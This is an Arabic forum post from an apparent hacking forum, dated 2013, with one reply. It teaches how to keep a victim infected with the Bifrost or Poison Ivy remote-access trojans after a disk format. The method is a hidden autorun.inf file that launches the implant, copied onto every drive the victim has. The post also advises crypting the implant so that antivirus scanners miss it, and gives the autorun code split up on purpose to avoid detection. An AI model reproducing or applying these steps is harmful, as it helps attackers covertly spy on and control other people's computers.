جيوش الهكر المغربي
مواقع صفحات مزورة 2015
http://totohacker.tw.ma

جيوش الهكر المغربي

جميع الحقوق محفوظة لجيوش الهكر المغربي
 
الرئيسيةاليوميةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول
missing
مواقع صفحات مزورة 2015 فقط على موقع جيوش الهكر المغربي مواقع صفحات مزورة

شاطر | 
 

 بقاء الضحية حتى بعد الفورمات (مجربة)

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
Toufik Hàckér
المدير
المدير
avatar

الدولة : المغرب
عدد المساهمات : 125
تاريخ التسجيل : 12/01/2013
العمر : 22
الموقع : totohacker.tw.ma

مُساهمةموضوع: بقاء الضحية حتى بعد الفورمات (مجربة)   الإثنين فبراير 11, 2013 5:08 am



===============منتدى جيوش الهكر المغربي===============


اخواني أرجو ان تكونو بخير

انا بشرفني اكتب لكم اجمل المواضيع التي تعجبكم

وان شاء الله الموضوع هاد بيعجبكم

بقاء الضحية عندك بلبيفروست او بلبويزون حتى لو عمل فورمات

انا عن نفسي مجربها

وذلك عن طريق

جعل سيرفرك Autorun .......



صنع ملف Autorun بحيث لو فتحت أحد الأقراص الموجوده لدى الضحيه

يشتغل الباتش معها على طول بحيث انك تضع ملف الأوتوران والسيرفر جميعهم في القرص المعني وجعلمهما مخفيان


فثلا لو وضعنا السيرفر بالقرص C


عندما يقوم الضحيه بفتح هذا القرص سوف يتم تشغيل السيرفر تلقائيا ً


بالطبع بديهيا ً غالب العامة يقوم بتنصيب الويندوز على القرص C


وعندما يقوم بعمل فورمات .. سوف يحذف ملف الأوتوران والسيرفر أيضا ً


فلذلك عليك بوضعهم في جميع الدرايفات ( الأقراص ) الموجوده لدى الضحية ( C: D: E: .... ect )

==========================================================

لطريقة:



المتطلبات:





1-سيرفر مشفر <== حبذا لو كان تشفير شخصي من جميع الحمايات الدارجة وغير مفحوص في مواقع الفحص لضمان بقائه طويل إذا لم يكن أبدياً




2-المفكرة <== مايحتاج




3-كود الأوتوران






تقوم بفتح المفكرة وتلصق بها هذا الكود



كود PHP:


[AutoRun]****lExecute=إسم سرفرك مع الإمتداد**** lopencom mand=إسم سرفرك مع الإمتدادsh e l lexploreco mmand=إسم سرفرك مع الإمتدادopen=إسم سرفرك مع الإمتداد




طبعا اخواني انا وضعت فراغ بين كلمة **** l ope n c om mand

احذفو كل الفراغات الي بلكود راح ارفعلكم اياه على مفكره اذا لم يضبط معكم



فمثلا لو كان اسم سيرفرك server.exe



سيصبح الكود بهذا الشكل




كود PHP:



[
[AutoRun]****lExecute=server.exesh ellopenco mmand=server.exe she ll exploreco mmand=server.exeopen=server.exe






للتوضيح





قم بلصق الكود مع تعديل مايلزم





قم بعمل ( حفظ بإسم )







احفظه بإمتداد inf









الملف الناتج







قم بوضعه في جميع أقراص الضحية ( C: D: E: ...ect )


وفي كل مرهـ يقوم الضحيه بفتح احد اقراصه .. يتم تشغيل السيرفر






وانسى أنك تفقدها



ألا ان الله قادر على كل شيء





لا تعتمد على احد فى هذة الدنيا حتى ظلك يتخلى عنك فى الظلام .

سأصل الى القمه وحدى دون مساعده من اى احد وعندما اصل لن ينافسنى عليها اى احد

TOufik hàckér
Made in Morocco ®️™️
| lll| lllll| lll||lll || llll |]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://totohacker.tw.ma
fathi wll
هكر مبتدى
هكر مبتدى
avatar

عدد المساهمات : 4
تاريخ التسجيل : 26/04/2013

مُساهمةموضوع: رد: بقاء الضحية حتى بعد الفورمات (مجربة)   السبت أبريل 27, 2013 1:26 am

شكراااااااااااااااااااااااااا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
بقاء الضحية حتى بعد الفورمات (مجربة)
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
جيوش الهكر المغربي  :: قسم اختراق العام-
انتقل الى: